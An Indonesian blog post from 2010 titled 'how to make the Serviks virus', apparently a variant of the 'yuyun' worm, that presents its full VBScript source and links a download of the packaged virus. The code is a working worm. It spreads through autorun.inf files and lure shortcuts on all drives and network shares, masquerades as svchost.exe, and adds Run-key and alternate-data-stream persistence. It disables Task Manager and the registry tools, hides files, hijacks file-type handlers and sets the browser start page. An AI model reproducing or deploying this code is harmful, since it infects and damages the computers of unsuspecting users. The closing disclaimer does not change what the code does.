Minggu, 07 Februari 2010

Cara Membuat Virus Serviks

Virus Serviks adalah varian dari virus yuyun yang telah di modifikasi, karena virus yuyun kurang sempurna menurutku. Saya akan memberitahu bagaimana cara membuat virus serviks, tapi saya mememerlukan enkript file. Tapi tenang saja, saya sudah sediakan di sini: Download Enkript.
Sebenarnya virus serviks atau yuyun, bisa di lihat dengan menggunakan "Change".
Hasil setelah dirubah menggunakan enkript change, hasilnya seperti ini:

On Error Resume Next
Dim fso, ws, status,status1, fly, tf
Set fso = CreateObject("scripting.filesystemobject")
Set ws = CreateObject("wscript.Shell")
Set sh = CreateObject("Shell.application")
Set net = CreateObject("wscript.network")
fly=false
tmp=fso.GetSpecialFolder(1)
tn=fso.GetTempName
tmpt=tmp+"\"+tn
docx=ws.SpecialFolders("MyDocuments")
Set swt=WScript.Arguments
on error resume next
set tf = fso.getfile("c:\windows\system32\wscript.exe")
tf.Attributes = 39
set tf = fso.getfile("c:\windows\svchost.exe")
tf.Attributes = 0
fso.copyfile "c:\windows\system32\wscript.exe", "c:\windows\svchost.exe"
set tf = fso.getfile("c:\windows\svchost.exe")
tf.Attributes = 39
on error resume next
If swt.Count>0 Then
status=swt(0)
End If
if fso.fileexists(tmp+"\msvbvm60.dll") then
set erd=fso.getfile(tmp+"\msvbvm60.dll")
erd.attributes=0
erd.name="fandi.erd"
if erd.name="fandi.erd" then
erd.name="msvbvm60.dll"
set erd=fso.opentextfile(tmp+"\msvbvm60.dll",2,true)
else
fly=true
end if
else
set erd=fso.opentextfile(tmp+"\msvbvm60.dll",2,true)
end if
Set AQ=fso.GetFile(status)
If fso.FileExists(tmpt) Then fso.GetFile(tmpt).Attributes=0
AQ.Copy tmpt,True
Set AQ=fso.GetFile(tmpt)
AQ.Attributes=39
anv=tmp+"\auto.exe"
If Not fso.FileExists(anv) Then AQ.Copy anv
Set auto=fso.GetFile(anv)
auto.attributes=0
Set aut=fso.OpenTextFile(anv,2,True,0)
isi="[autorun]>open=WScript.exe //e:VBScript dekstop.ini auto>shell\open=Open>shell\open\Command=WScript.exe //e:VBScript dekstop.ini auto>shell\open\Default=1>shell\explore=Explore>shell\explore\Command=WScript.exe //e:VBScript dekstop.ini auto"
isi=Replace(isi,">",vbCrLf)
aut.Write isi
aut.Close
auto.Attributes=39
ltkc=sh.Namespace(&H1c&).Self.path + "\Microsoft\CD Burning"
AQ.Copy ltkc+"\dekstop.ini",True
auto.Copy ltkc+"\autorun.inf",True
If fso.FileExists(docx+"\df5srvc.bfe") Then fso.GetFile(docx+"\df5srvc.bfe").Attributes=0
AQ.Copy tmp+"\df5srvc.bfe",True
If fso.FileExists(tmp+"\serviks.sys") Then fso.GetFile(tmp+"\serviks.sys").Attributes=0
AQ.Copy tmp+"\serviks.sys",True
regQ
Set rara=UNISKA
Hertz False
If Day(Now)<>3 Then rekursif docx,1 Else rekursif docx,3
call attack_net
Hertz True
Sub rekursif(path,dp)
On Error Resume Next
dropf path
wscript.sleep 50
If dp>0 Then
For Each fldr1 In fso.GetFolder(path+"\").SubFolders
rekursif fldr1.Path, dp-1
Next
End If
End Sub
Sub dropf(path)
On Error Resume Next
if day(now)=1 and (month(now)mod 3)=1 then
rara.copy path+"\Diary Angel.rtf"
rara.copy path+"\About Me.rtf"
end if
g1=path+"\autorun.inf"
g2=path+"\dekstop.ini"
If fso.FileExists(g1) Then
Set g11=fso.GetFile(g1)
If g11.Attributes<>39 Then
g11.Attributes=0
auto.Copy path+"\autorun.inf",True
end if
else
auto.Copy path+"\autorun.inf",True
end if
If fso.FileExists(g2) Then
Set g12=fso.GetFile(g2)
If g12.Attributes<>39 Then
g12.Attributes=0
AQ.Copy path+"\dekstop.ini",True
end if
else
AQ.Copy path+"\dekstop.ini",True
End If
If Not fso.FileExists(path+"\Folder.lnk") Then
kiddrock path+"\Folder","Folder"
drop=Array("Foto Bugil","Pesan Rahasia","Data Penting","Puisi Cinta","Antivirus","Software")
ww=1
For Each d In drop
If Day(now) Mod 3 = ww Then kiddrock path+"\"+d,d
wscript.sleep 60
ww=ww+1
Next
r=0
For Each fldr In fso.GetFolder(path+"\").SubFolders
kiddrock path+"\"+fldr.name,fldr.Name
wscript.sleep 60
If r>3 Then
Exit For
End if
r=r+1
Next
End If
End Sub
Sub kiddrock(path,trgt)
Set shor=ws.CreateShortcut(path+".lnk")
shor.iconlocation="shell32.dll,3"
shor.targetpath="wscript.exe"
shor.arguments="//e:VBScript dekstop.ini """+trgt+""""
shor.save
End Sub
function attack_net()
On Error Resume Next
err.clear
Set objFolder = sh.Namespace(&H13&)
Set colItems = objFolder.Items
For Each strFileName in objFolder.Items
t= objFolder.GetDetailsOf(strFileName, 14)
if fso.folderexists(t) then
rekursif t,4
end if
Next
End function
Sub tdr()
On Error Resume Next
err.clear
WScript.Sleep 180000
if err.number>0 then wscript.quit
End Sub
function UNISKA()
On error resume next
x=vbcrlf
adv="Diary Angel Cute>>Rasa jatuh cinta memang aneh rasanya >Q kenal fandy lewat no.Hp nyasar, dari perkenalan itu Q agak jual mahal ke dy (maklum cwe).>Hari berganti hari Q mulai penasaran ma dy, rasanya hatiku telah di kuasai oleh dy.>Q dan dy sepakat untuk ketemuan di kampusQ, dy pun datang pakai jaket hitam dengan motor warna hitam pula.>Alangkah terkejutnya, Q diajak dy kerumahnya.>Kita ngobrol tentang pekerjaan dy, dy jg banyak tanya tentang Q di kampus. >Waktu pun cepat berlalu, karena asik ngobrol tak terasa hari sudah sore.>Q pun minta di antar pulang, Q boncengan ma dy seolah-olah kt sudah pacaran.>Hujan pun datang disaat kt dalam perjalanan pulang, rasa dingin menyelimuti tubuhku ini.>Dengan gagahnya dy memberi Q jaket yg dy pakai, hujan pun makin deras dan cuaca semakin dingin.>Rasa sayang ini semakin menguasai pikiranku, ingin rasanya Q peluk dy.>>Setelah Q sampai di rumah, dy terburu-buru pulang karena hujan makin deras.>Satu jam setelah dy pulang, dy kasih kabar kalau sudah sampai rumah dengan selamet.>>Yang bikin Q bingung, perasaan tadi dy pulang sendiri?>Kenapa dy pulang dengan selamet, siapakah selamet?>>Cerita ini sebagian adalah kisah nyata, tapi karena terbatas oleh waktu.>Maka cukup sekian dan terimakasih.>>>(www.bendot.co.nr)"
adv=replace(adv,">",x)
set serviks=fso.opentextfile(tmp+"\v.doc",2,true)
serviks.write adv
serviks.close
if day(now)=1 and (month(now)mod 3)=1 then
if fly=false then
for i=1 to 3
ws.run "notepad.exe /p """+tmp+"\v.doc"""
next
end if
end if
set UNISKA=fso.getfile(tmp+"\v.doc")
end function
Sub regQ()
On Error Resume Next
if day(now)=1 then
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\", "Serviks"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\DefaultIcon\","shell32.dll,48"
ws.RegWrite "HKCR\CLSID\{11111111-2222-3333-4444-555555555555}\ShellFolder\Attributes",0,"REG_DWORD"
ws.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\explorer\Desktop\NameSpace\{11111111-2222-3333-4444-555555555555}\",""
end if
ws.regdelete "HKCR\lnkfile\IsShortcut"
ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.bendot.co.nr"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Df5serv","Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Svchost","c:\windows\svchost.exe //e:VBScript """+tmp+"\serviks.sys"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Explorer","Wscript.exe //e:VBScript """+ltkc+"\dekstop.ini"""
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools",1,"REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
ws.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\WarningIfNotDefault","sorry serviks like your computer"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\CheckedValue",0,"REG_DWORD"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\UncheckedValue",0,"REG_DWORD"
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden\DefaultValue",0,"REG_DWORD"
ws.RegWrite "HKCR\lnkfile\shell\Delete\command", "logoff.exe"
ws.RegWrite "HKCR\regfile\shell\Merge\command", "Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
ws.RegWrite "HKCR\inffile\shell\Install\command", "logoff.exe"
ws.RegWrite "HKCR\VBSfile\shell\Open\command", "Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
ws.RegWrite "HKCR\VBEfile\shell\Open\command", "Wscript.exe //e:VBScript """+docx+"\df5srvc.bfe"""
if lcase(fso.getdrive("c:").FileSystem)="ntfs" then
erdQ=AQ.openastextstream(1,0).read(AQ.size)
www=fso.GetSpecialFolder(0)
set jjk=fso.opentextfile(www+"\:Microsoft Office Update for Windows XP.sys",2,true)
jjk.write erdQ
jjk.close
ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\WinUpdate","Wscript.exe //e:VBScript """+www+"\:Microsoft Office Update for Windows XP.sys"""
end if
End Sub
Sub Hertz(ooo)
On Error Resume Next
do
For Each drv In fso.Drives
If drv.DriveType=1 Then
rekursif drv.Path,4
Else
rekursif drv.Path,2
End if
Next
if fly=false then
tdr
else
wscript.quit
end if
regQ
If ooo=False Then
Exit Do
End If
loop
End Sub

Nah itulah code yang ada pada tubuh virus serviks, untuk mendownload virus serviks klik di sini: New Serviks.rar

Sekian ilmu yang bisa saya berikan kepada anda, semoga anda tidak menyalahgunakan ilmu ini.
Segala resiko ditanggung anda sendiri, saya tidak bertanggung jawab apa yang anda lakukan dengan code diatas.